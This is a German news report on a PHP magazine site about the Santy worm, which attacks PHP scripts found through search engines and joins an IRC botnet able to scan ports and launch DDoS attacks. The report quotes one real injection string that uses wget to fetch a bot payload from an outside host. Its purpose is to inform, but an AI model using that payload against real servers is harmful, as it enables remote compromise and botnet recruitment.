1. PHP Magazin
  2. Software & Web-Development
  3. Wurm attackiert PHP-Skripte

Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Ratings

There are no comments available yet.

Here you can write a comment


Please enter at least 10 characters.
Loading... Please wait.
* Pflichtangabe

Related topics

PHPCon East 2003 in New York City

Auch dieses Jahr findet in New York City die PHPcon 2003 statt. Für alle die zu dieser Zeit in NY sind, empfehlen wir einen Besuch der PHPcon Konferenz. Hier der Originaltext des Veranstalters: Like PHP? Love PHP? LIVE PHP! Last year we launche ...

admin

Autor : admin
Category: Software & Web-Development

Deutsche Yii Framework Community

Seit dem 19.03.2012 gibt es für die Yii PHP Framework Community ein deutsches Zuhause. ...

dhcomputer

Autor : dhcomputer
Category: Software & Web-Development

Weit über 120.000 PCs infiziert !

Der Virus W32.Blaster verbreitet sich doch nicht so schnell, wie zuerst angenommen. Während Symantec meint, dass 120.00 PCs infiziert sind schätzt CERT/CC die Zahl auf 1.4 Millionen. Logischer und annehmungswahrer ist die Zahl näher bei Symantec. Der ...

admin

Autor : admin
Category: Software & Web-Development

DENIC begrenzt Zugriff auf Domaindaten

Durch ein automatisches System will die DENIC ab 1. Juli die Zahl der whois-Abfragen in einem bestimmten Zeitintervall begrenzen und damit Massenabfragen verhindern. Damit will die DENIC Domaininhaber besser vor einer automatisierten Verwertung ihrer Adre ...

admin

Autor : admin
Category: Software & Web-Development

NuSphere veröffentlicht PhpED 4.6 Professional and Standard

NuSphere ist froh, den neuen PhpED Version 4.6 und PhpED Standard Version 4.6 mit der ganzen Reihe von Neuen Eigenschaften und Neuer Preiskalkulation und Steigungsmodell zu veröffentlichen. Version 4.6 ist ein wichtiger Schritt, der PhpED noch näher zu e ...

admin

Autor : admin
Category: Software & Web-Development

NGI bringt DSL-Flatrate

Die Firma NGI (New Generation Internet) nutzt das verlängerte Wochenende, um seine Kunden in einer Mailing-Aktion auf den Start der DSL-Flatrate hinzuweisen. Ab Dienstag soll NGI-DSL mit einem Downstream von 1 MBit/s und einem Upstream von 256 kBit/s bei ...

admin

Autor : admin
Category: Software & Web-Development

Magazin & Tutorials
ebiz-consult GmbH & Co. KG
Wir entwickeln seit über 20 Jahren Web & E-Commerce Anwendungen
Egelsbach, Deutschland

Publish a press release

Share your news and information

Share your news and information with others

You want to inform other users about an interesting IT topic, then sign up now and share it with our PHP community

learn more

Publish a press release